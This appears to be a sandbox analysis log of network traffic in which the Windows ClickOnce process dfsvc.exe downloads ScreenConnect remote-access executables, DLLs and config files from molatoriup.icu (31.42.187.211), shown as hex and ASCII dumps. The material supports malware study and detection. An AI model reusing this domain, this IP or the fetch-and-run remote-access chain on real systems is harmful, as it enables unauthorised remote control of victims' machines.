2024-10-04 23:03:10 UTC	16384	IN	Data Raw: 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b 86 Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF\|t^8uYt8uP0(YYt8uPYYv\|YYtE8u@-P
2024-10-04 23:03:10 UTC	16384	IN	Data Raw: 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39 50 Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@\|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9P
2024-10-04 23:03:10 UTC	16384	IN	Data Raw: 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00 00 Data Ascii: e-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
2024-10-04 23:03:10 UTC	13815	IN	Data Raw: 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b 37 Data Ascii: 3033333444(414B4T4o44444/595?5E555557%88P9h9999999999O::;p;{;;;,<<<W======>>>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:10 UTC	106	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:11 UTC	215	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 61216 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:34 GMT Connection: close
2024-10-04 23:03:11 UTC	16169	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
2024-10-04 23:03:11 UTC	16384	IN	Data Raw: 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19 06 Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
2024-10-04 23:03:11 UTC	16384	IN	Data Raw: 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00 54 Data Ascii: hresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_ItemT
2024-10-04 23:03:11 UTC	12279	IN	Data Raw: 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 Data Ascii: onnect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion24.2.10.8991BAssembly Version24.2.10.8991

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:12 UTC	110	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:12 UTC	213	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:36 GMT Connection: close
2024-10-04 23:03:12 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:13 UTC	105	OUT	GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:13 UTC	213	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:37 GMT Connection: close
2024-10-04 23:03:13 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:14 UTC	113	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:14 UTC	213	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:38 GMT Connection: close
2024-10-04 23:03:14 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:15 UTC	103	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:15 UTC	215	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 81696 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:39 GMT Connection: close
2024-10-04 23:03:15 UTC	16169	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
2024-10-04 23:03:15 UTC	16384	IN	Data Raw: 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 d2 59 fd a1 c3 db f8 b2 a8 38 41 41 b5 70 2f b9 70 e0 44 04 4a 6f 16 7f 54 f3 2d 91 6d bf ac 66 21 46 ef be d1 1e 85 dd 2b 75 b8 ff 7a 0d c8 39 d0 7b 2a 86 54 8d 79 d9 5d b2 8a 3c 12 a6 c1 3c 94 5c c5 c2 54 9b e5 b0 38 01 34 d6 47 4a 0b 62 7d 82 0a bc 8e 63 9f ae dc 13 7e 39 98 c7 b5 f2 fd 11 5b 4c 23 82 a4 fd 40 df 22 18 d8 3f 0b 56 59 b3 b5 88 4c 17 d4 e9 59 bc f3 d5 72 d6 78 1b 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34 07 Data Ascii: 452b-8975-74a85828d354TextStateY8AAp/pDJoT-mf!F+uz9{*Ty]<<\T84GJb}c~9[L#@"?VYLYrx{^@RSDSL[M9iHF4
2024-10-04 23:03:16 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff ff Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
2024-10-04 23:03:16 UTC	16384	IN	Data Raw: d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00 00 Data Ascii: ffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
2024-10-04 23:03:16 UTC	16375	IN	Data Raw: 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:16 UTC	91	OUT	GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:17 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 197120 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:40 GMT Connection: close
2024-10-04 23:03:17 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
2024-10-04 23:03:17 UTC	16384	IN	Data Raw: 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 Data Ascii: &rYpov&(, ow&}ow&o)*.(&(^uw,w(0@surpov&rYpov&(, ow&}ow&o).(&(^ux,x(*0@su
2024-10-04 23:03:17 UTC	16384	IN	Data Raw: 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc 06 Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
